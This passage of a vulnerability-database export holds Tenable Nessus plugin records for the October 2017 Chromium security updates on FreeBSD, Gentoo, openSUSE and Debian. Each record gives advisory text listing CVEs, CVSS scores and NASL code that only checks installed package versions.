KeenLab, Tencent on 2017-08-30\n\n- [765384] High CVE-2017-5127: Use after free in PDFium. Reported by\nLuat Nguyen on KeenLab, Tencent on 2017-09-14\n\n- [765469] High CVE-2017-5128: Heap overflow in WebGL. Reported by\nOmair on 2017-09-14\n\n- [765495] High CVE-2017-5129: Use after free in WebAudio. Reported by\nOmair on 2017-09-15\n\n- [718858] High CVE-2017-5132: Incorrect stack manipulation in\nWebAssembly. Reported by Gaurav Dewan of Adobe Systems India Pvt. Ltd.\non 2017-05-05\n\n- [722079] High CVE-2017-5130: Heap overflow in libxml2. Reported by\nPranjal Jumde on 2017-05-14\n\n- [744109] Medium CVE-2017-5131: Out of bounds write in Skia. Reported\nby Anonymous on 2017-07-16\n\n- [762106] Medium CVE-2017-5133: Out of bounds write in Skia. Reported\nby Aleksandar Nikolic of Cisco Talos on 2017-09-05\n\n- [752003] Medium CVE-2017-15386: UI spoofing in Blink. Reported by\nWenXu Wu of Tencent's Xuanwu Lab on 2017-08-03\n\n- [756040] Medium CVE-2017-15387: Content security bypass. Reported by\nJun Kokatsu on 2017-08-16\n\n- [756563] Medium CVE-2017-15388: Out of bounds read in Skia. Reported\nby Kushal Arvind Shah of Fortinet's FortiGuard Labs on 2017-08-17\n\n- [739621] Medium CVE-2017-15389: URL spoofing in Omnibox. Reported by\nxisigr of Tencent's Xuanwu Lab on 2017-07-06\n\n- [750239] Medium CVE-2017-15390: URL spoofing in Omnibox. Reported by\nHaosheng Wang on 2017-07-28\n\n- [598265] Low CVE-2017-15391: Extension limitation bypass in\nExtensions. Reported by Joao Lucas Melo Brasio on 2016-03-28\n\n- [714401] Low CVE-2017-15392: Incorrect registry key handling in\nPlatformIntegration. Reported by Xiaoyin Liu on 2017-04-22\n\n- [732751] Low CVE-2017-15393: Referrer leak in Devtools. Reported by\nSvyat Mitin on 2017-06-13\n\n- [745580] Low CVE-2017-15394: URL spoofing in extensions UI. Reported\nby Sam on 2017-07-18\n\n- [759457] Low CVE-2017-15395: NULL pointer dereference in\nImageCapture. Reported by Johannes Bergman on 2017-08-28\n\n- [775550] Various fixes from internal audits, fuzzing and other\ninitiatives\"\n );\n # https://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?441fea3d\"\n );\n # https://vuxml.freebsd.org/freebsd/a692bffe-b6ad-11e7-a1c2-e8e0b747a45a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d1f39060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<62.0.3202.62\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T11:06:40", "description": "The remote host is affected by the vulnerability described in GLSA-201710-24\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the referenced CVE identifiers and Google Chrome\n Releases for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, bypass\n content security controls, or conduct URL spoofing.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 28, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-10-23T00:00:00", "title": "GLSA-201710-24 : Chromium, Google Chrome: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "modified": "2017-10-23T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:google-chrome", "p-cpe:/a:gentoo:linux:chromium"], "id": "GENTOO_GLSA-201710-24.NASL", "href": "https://www.tenable.com/plugins/nessus/104067", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201710-24.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104067);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-15386\", \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15389\", \"CVE-2017-15390\", \"CVE-2017-15391\", \"CVE-2017-15392\", \"CVE-2017-15393\", \"CVE-2017-15394\", \"CVE-2017-15395\", \"CVE-2017-5124\", \"CVE-2017-5125\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\", \"CVE-2017-5129\", \"CVE-2017-5130\", \"CVE-2017-5131\", \"CVE-2017-5132\", \"CVE-2017-5133\");\n script_xref(name:\"GLSA\", value:\"201710-24\");\n\n script_name(english:\"GLSA-201710-24 : Chromium, Google Chrome: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201710-24\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the referenced CVE identifiers and Google Chrome\n Releases for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, bypass\n content security controls, or conduct URL spoofing.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?441fea3d\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201710-24\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-62.0.3202.62'\n All Google Chrome users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/google-chrome-62.0.3202.62'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:google-chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 62.0.3202.62\"), vulnerable:make_list(\"lt 62.0.3202.62\"))) flag++;\nif (qpkg_check(package:\"www-client/google-chrome\", unaffected:make_list(\"ge 62.0.3202.62\"), vulnerable:make_list(\"lt 62.0.3202.62\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium / Google Chrome\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:31:19", "description": "This update to Chromium 62.0.3202.75 fixes the following security\nissues :\n\n - CVE-2017-5124: UXSS with MHTML\n\n - CVE-2017-5125: Heap overflow in Skia\n\n - CVE-2017-5126: Use after free in PDFium \n\n - CVE-2017-5127: Use after free in PDFium\n\n - CVE-2017-5128: Heap overflow in WebGL\n\n - CVE-2017-5129: Use after free in WebAudio \n\n - CVE-2017-5132: Incorrect stack manipulation in\n WebAssembly.\n\n - CVE-2017-5130: Heap overflow in libxml2\n\n - CVE-2017-5131: Out of bounds write in Skia \n\n - CVE-2017-5133: Out of bounds write in Skia \n\n - CVE-2017-15386: UI spoofing in Blink\n\n - CVE-2017-15387: Content security bypass\n\n - CVE-2017-15388: Out of bounds read in Skia\n\n - CVE-2017-15389: URL spoofing in OmniBox\n\n - CVE-2017-15390: URL spoofing in OmniBox \n\n - CVE-2017-15391: Extension limitation bypass in\n Extensions.\n\n - CVE-2017-15392: Incorrect registry key handling in\n PlatformIntegration\n\n - CVE-2017-15393: Referrer leak in Devtools\n\n - CVE-2017-15394: URL spoofing in extensions UI\n\n - CVE-2017-15395: NULL pointer dereference in ImageCapture\n\n - CVE-2017-15396: Stack overflow in V8", "edition": 21, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-10-30T00:00:00", "title": "openSUSE Security Update : chromium (openSUSE-2017-1221)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "modified": "2017-10-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromedriver", "cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:chromium-debuginfo"], "id": "OPENSUSE-2017-1221.NASL", "href": "https://www.tenable.com/plugins/nessus/104244", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1221.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104244);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-15386\", \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15389\", \"CVE-2017-15390\", \"CVE-2017-15391\", \"CVE-2017-15392\", \"CVE-2017-15393\", \"CVE-2017-15394\", \"CVE-2017-15395\", \"CVE-2017-15396\", \"CVE-2017-5124\", \"CVE-2017-5125\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\", \"CVE-2017-5129\", \"CVE-2017-5130\", \"CVE-2017-5131\", \"CVE-2017-5132\", \"CVE-2017-5133\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2017-1221)\");\n script_summary(english:\"Check for the openSUSE-2017-1221 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to Chromium 62.0.3202.75 fixes the following security\nissues :\n\n - CVE-2017-5124: UXSS with MHTML\n\n - CVE-2017-5125: Heap overflow in Skia\n\n - CVE-2017-5126: Use after free in PDFium \n\n - CVE-2017-5127: Use after free in PDFium\n\n - CVE-2017-5128: Heap overflow in WebGL\n\n - CVE-2017-5129: Use after free in WebAudio \n\n - CVE-2017-5132: Incorrect stack manipulation in\n WebAssembly.\n\n - CVE-2017-5130: Heap overflow in libxml2\n\n - CVE-2017-5131: Out of bounds write in Skia \n\n - CVE-2017-5133: Out of bounds write in Skia \n\n - CVE-2017-15386: UI spoofing in Blink\n\n - CVE-2017-15387: Content security bypass\n\n - CVE-2017-15388: Out of bounds read in Skia\n\n - CVE-2017-15389: URL spoofing in OmniBox\n\n - CVE-2017-15390: URL spoofing in OmniBox \n\n - CVE-2017-15391: Extension limitation bypass in\n Extensions.\n\n - CVE-2017-15392: Incorrect registry key handling in\n PlatformIntegration\n\n - CVE-2017-15393: Referrer leak in Devtools\n\n - CVE-2017-15394: URL spoofing in extensions UI\n\n - CVE-2017-15395: NULL pointer dereference in ImageCapture\n\n - CVE-2017-15396: Stack overflow in V8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1064066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1065405\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromedriver-62.0.3202.75-104.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromedriver-debuginfo-62.0.3202.75-104.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromium-62.0.3202.75-104.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromium-debuginfo-62.0.3202.75-104.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromium-debugsource-62.0.3202.75-104.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-62.0.3202.75-118.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-debuginfo-62.0.3202.75-118.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-62.0.3202.75-118.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debuginfo-62.0.3202.75-118.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debugsource-62.0.3202.75-118.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:50:59", "description": "Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\nIn addition, this message serves as an annoucment that security\nsupport for chromium in the oldstable release (jessie), Debian 8, is\nnow discontinued.\n\nDebian 8 chromium users that desire continued security updates are\nstrongly encouraged to upgrade now to the current stable release\n(stretch), Debian 9.\n\nAn alternative is to switch to the firefox browser, which will\ncontinue to receive security updates in jessie for some time.\n\n - CVE-2017-5124\n A cross-site scripting issue was discovered in MHTML.\n\n - CVE-2017-5125\n A heap overflow issue was discovered in the skia\n library.\n\n - CVE-2017-5126\n Luat Nguyen discovered a use-after-free issue in the\n pdfium library.\n\n - CVE-2017-5127\n Luat Nguyen discovered another use-after-free issue in\n the pdfium library.\n\n - CVE-2017-5128\n Omair discovered a heap overflow issue in the WebGL\n implementation.\n\n - CVE-2017-5129\n Omair discovered a use-after-free issue in the WebAudio\n implementation.\n\n - CVE-2017-5131\n An out-of-bounds write issue was discovered in the skia\n library.\n\n - CVE-2017-5132\n Guarav Dewan discovered an error in the WebAssembly\n implementation.\n\n - CVE-2017-5133\n Aleksandar Nikolic discovered an out-of-bounds write\n issue in the skia library.\n\n - CVE-2017-15386\n WenXu Wu discovered a user interface spoofing issue.\n\n - CVE-2017-15387\n Jun Kokatsu discovered a way to bypass the content\n security policy.\n\n - CVE-2017-15388\n Kushal Arvind Shah discovered an out-of-bounds read\n issue in the skia library.\n\n - CVE-2017-15389\n xisigr discovered a URL spoofing issue.\n\n - CVE-2017-15390\n Haosheng Wang discovered a URL spoofing issue.\n\n - CVE-2017-15391\n Joao Lucas Melo Brasio discovered a way for an extension\n to bypass its limitations.\n\n - CVE-2017-15392\n Xiaoyin Liu discovered an error the implementation of\n registry keys.\n\n - CVE-2017-15393\n Svyat Mitin discovered an issue in the devtools.\n\n - CVE-2017-15394\n Sam discovered a URL spoofing issue.\n\n - CVE-2017-15395\n Johannes Bergman discovered a NULL pointer dereference\n issue.\n\n - CVE-2017-15396\n Yuan Deng discovered a stack overflow issue in the v8\n JavaScript library.", "edition": 26, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-07T00:00:00", "title": "Debian DSA-4020-1 : chromium-browser - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5124"], "modified": "2017-11-07T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium-browser", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4020.NASL", "href": "https://www.tenable.com/plugins/nessus/104414", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4020. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104414);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-15386\", \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15389\", \"CVE-2017-15390\", \"CVE-2017-15391\", \"CVE-2017-15392\", \"CVE-2017-15393\", \"CVE-2017-15394\", \"CVE-2017-15395\", \"CVE-2017-15396\", \"CVE-2017-5124\", \"CVE-2017-5125\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\", \"CVE-2017-5129\", \"CVE-2017-5131\", \"CVE-2017-5132\", \"CVE-2017-5133\");\n script_xref(name:\"DSA\", value:\"4020\");\n\n script_name(english:\"Debian DSA-4020-1 : chromium-browser - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\nIn addition, this message serves as an annoucment that security\nsupport for chromium in the oldstable release (jessie), Debian 8, is\nnow discontinued.\n\nDebian 8 chromium users that desire continued security updates are\nstrongly encouraged to upgrade now to the current stable release\n(stretch), Debian 9.\n\nAn alternative is to switch to the firefox browser, which will\ncontinue to receive security updates in jessie for some time.\n\n - CVE-2017-5124\n A cross-site scripting issue was discovered in MHTML.\n\n - CVE-2017-5125\n A heap overflow issue was discovered in the skia\n library.\n\n - CVE-2017-5126\n Luat Nguyen discovered a use-after-free issue in the\n pdfium library.\n\n - CVE-2017-5127\n Luat Nguyen discovered another use-after-free issue in\n the pdfium library.\n\n - CVE-2017-5128\n Omair discovered a heap overflow issue in the WebGL\n implementation.\n\n - CVE-2017-5129\n Omair discovered a use-after-free issue in the WebAudio\n implementation.\n\n - CVE-2017-5131\n An out-of-bounds write issue was discovered in the skia\n library.\n\n - CVE-2017-5132\n Guarav Dewan discovered an error in the WebAssembly\n implementation.\n\n - CVE-2017-5133\n Aleksandar Nikolic discovered an out-of-bounds write\n issue in the skia library.\n\n - CVE-2017-15386\n WenXu Wu discovered a user interface spoofing issue.\n\n - CVE-2017-15387\n Jun Kokatsu discovered a way to bypass the content\n security policy.\n\n - CVE-2017-15388\n Kushal Arvind Shah discovered an out-of-bounds read\n issue in the skia library.\n\n - CVE-2017-15389\n xisigr discovered a URL spoofing issue.\n\n - CVE-2017-15390\n Haosheng Wang discovered a URL spoofing issue.\n\n - CVE-2017-15391\n Joao Lucas Melo Brasio discovered a way for an extension\n to bypass its limitations.\n\n - CVE-2017-15392\n Xiaoyin Liu discovered an error the implementation of\n registry keys.\n\n - CVE-2017-15393\n Svyat Mitin discovered an issue in the devtools.\n\n - CVE-2017-15394\n Sam discovered a URL spoofing issue.\n\n - CVE-2017-15395\n Johannes Bergman discovered a NULL pointer dereference\n issue.\n\n - CVE-2017-15396\n Yuan Deng discovered a stack overflow issue in the v8\n JavaScript library.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5129\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5131\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5132\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5133\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-15386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-15387\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-15388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-15389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-15390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-15391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-15392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-15393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 